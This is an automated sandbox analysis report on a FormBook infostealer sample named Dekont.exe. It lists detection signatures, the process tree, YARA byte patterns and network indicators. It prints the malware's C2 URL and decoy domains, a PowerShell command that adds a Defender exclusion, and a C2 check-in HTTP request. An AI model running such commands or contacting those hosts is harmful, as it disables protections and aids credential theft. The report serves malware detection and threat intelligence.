Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dekont.exe

Overview

General Information

Sample name:Dekont.exe
Analysis ID:1517901
MD5:da966801158ea63939a23e310275241a
SHA1:ef1f98cd080aca6cbf0b1ea8b08e7ab492435ae8
SHA256:883b2afba671ff4851527b315260a4415a111c013811fec1822dcae4076628e5
Tags:exegeoTURuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Dekont.exe (PID: 1816 cmdline: "C:\Users\user\Desktop\Dekont.exe" MD5: DA966801158EA63939A23E310275241A)
    • powershell.exe (PID: 3500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Dekont.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\Dekont.exe" MD5: DA966801158EA63939A23E310275241A)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 432 cmdline: /c del "C:\Users\user\Desktop\Dekont.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
  • 0x2b9:$a1: E9 92 9D FF FF C3 E8
00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
      • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
      00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Dekont.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Dekont.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.Dekont.exe.400000.0.raw.unpackWindows_Trojan_Diceloader_15eeb7b9unknownunknown
          • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
          5.2.Dekont.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.Dekont.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-25T09:00:23.908530+020020314531Malware Command and Control Activity Detected192.168.2.549715185.26.122.7080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}
          Multi AV Scanner detection for submitted file
          Source: Dekont.exeReversingLabs: Detection: 57%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: Dekont.exeJoe Sandbox ML: detected
          Source: Dekont.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Dekont.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: GHQc.pdb source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdbUGP source: Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: GHQc.pdbSHA256 source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdb source: Dekont.exe, Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 4x nop then pop edi5_2_0040E461
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi8_2_02B3E461

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.avada-casino-tlj.buzz/bc01/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.nnevateknoloji.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.omotech-dz.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ar-accident-lawyer-389.today replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ebshieldsrenew.live replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.inancialenlightment.info replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.nnevateknoloji.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.eals.lat replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.eddogbrands.website replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hildrens-clothing.today replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.olocaustaffirmer.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.y-language-menu.net replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: HOSTLANDRU HOSTLANDRU
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0E750F82 getaddrinfo,setsockopt,recv,6_2_0E750F82
          Source: global trafficHTTP traffic detected: GET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.ar-accident-lawyer-389.today
          Source: global trafficDNS traffic detected: DNS query: www.nnevateknoloji.xyz
          Source: global trafficDNS traffic detected: DNS query: www.eddogbrands.website
          Source: global trafficDNS traffic detected: DNS query: www.inancialenlightment.info
          Source: global trafficDNS traffic detected: DNS query: www.omotech-dz.net
          Source: global trafficDNS traffic detected: DNS query: www.y-language-menu.net
          Source: global trafficDNS traffic detected: DNS query: www.ebshieldsrenew.live
          Source: global trafficDNS traffic detected: DNS query: www.oko.events
          Source: global trafficDNS traffic detected: DNS query: www.hildrens-clothing.today
          Source: global trafficDNS traffic detected: DNS query: www.olocaustaffirmer.net
          Source: global trafficDNS traffic detected: DNS query: www.eals.lat
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4517983808.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000002.4527294039.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4527411989.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2087941103.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Dekont.exe, 00000000.00000002.2068088003.0000000002972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48xc300mw.autos
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48xc300mw.autos/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48xc300mw.autosReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ar-accident-lawyer-389.today
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ar-accident-lawyer-389.today/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ar-accident-lawyer-389.todayReferer:
          Source: explorer.exe, 00000006.00000000.2095427766.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097513506.000000000C8E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094949963.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096503518.000000000C8D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/www.qzxx.top
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzzReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat/bc01/www.lussalesapp.website
